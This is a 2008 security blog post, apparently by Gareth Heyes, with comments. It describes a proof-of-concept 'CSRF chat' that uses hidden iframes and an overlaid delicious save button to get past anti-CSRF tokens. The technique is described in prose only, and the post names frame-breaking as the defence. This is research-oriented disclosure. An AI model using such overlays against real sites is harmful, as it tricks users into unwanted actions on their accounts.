Skip to content

CSRF chat

You may think adding tokens to your forms will completely protect you from CSRF, you’d be wrong. I’ve shown in previous blog entries how you can use CSS overlays to bypass tokens. I decided to create a real world example which uses these techniques to create something cool. The world’s first CSRF chat! I got a couple of friends to try it out on various browsers and we could successfully communicate in pretty much real time.

Try it out here:-
CSRF chat

The technique uses delicious as a central hub to store the chat data, using a bookmarked url as a username and the description as chat data. A login is performed first using a hidden iframe with one delicious account shared between chat users. Another iframe is then used to load the messages, using JSON which is provided by delicious the chat data is then displayed. Confirmation is required because delicious uses tokens, I simply overlay the request using yet another iframe which displays the save button from the delicious web site.

Big thanks to David, Ronald, Mario and everyone else who helped test the chat room.

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • del.icio.us
  • Slashdot
  • StumbleUpon

Comments 7

  1. John Ther wrote:

    Good stuff Gareth, good CSS Overlay demonstration. Although it’s matter of time someone to change password and settings and other stuff for xsschat from delicious :)

    Posted 11 Feb 2008 at 2:06 pm
  2. Gareth Heyes wrote:

    Thanks John yeah you’re right but it’s all in the name of fun :)

    Posted 11 Feb 2008 at 2:07 pm
  3. Chris Shiflett wrote:

    Very creative. :-)

    For my own clarification, and perhaps that of others, this technique requires the ability to manipulate the page, correct?

    An anti-CSRF token should be pretty strong unless there are lurking XSS problems, which I think we all agree is easier said than done. It’s nice to be clear about where the risk lies.

    Thanks!

    Posted 11 Feb 2008 at 6:48 pm
  4. Gareth Heyes wrote:

    @chris

    The only requirement is central storage of data. This could be Wordpress blog, GMail account, delicious account, flickr account etc. You must also be able to read that data externally, in this case I used the delicious JSON functionality.

    Delicious contains a form token to prevent posting of new urls to an account, however I simply bypass this by asking the user to confirm the post.

    Posted 11 Feb 2008 at 7:01 pm
  5. Gareth Heyes wrote:

    btw I’m not saying tokens themselves are useless but in this instance they are. To defend against this type of attack a simple framebreaker would help.

    Posted 11 Feb 2008 at 7:13 pm
  6. Gareth Heyes wrote:

    The account has been deleted now, I can’t be bothered setting up another one. I may change the POC to allow multiple chatrooms or if anyone wants to take the code and improve it then please do.

    Posted 12 Feb 2008 at 10:10 am
  7. blog wrote:

    thanks you.. john :-)

    Posted 09 May 2008 at 11:39 am

Post a Comment

Your email is never published nor shared. Required fields are marked *

Comment spam protected by SpamBam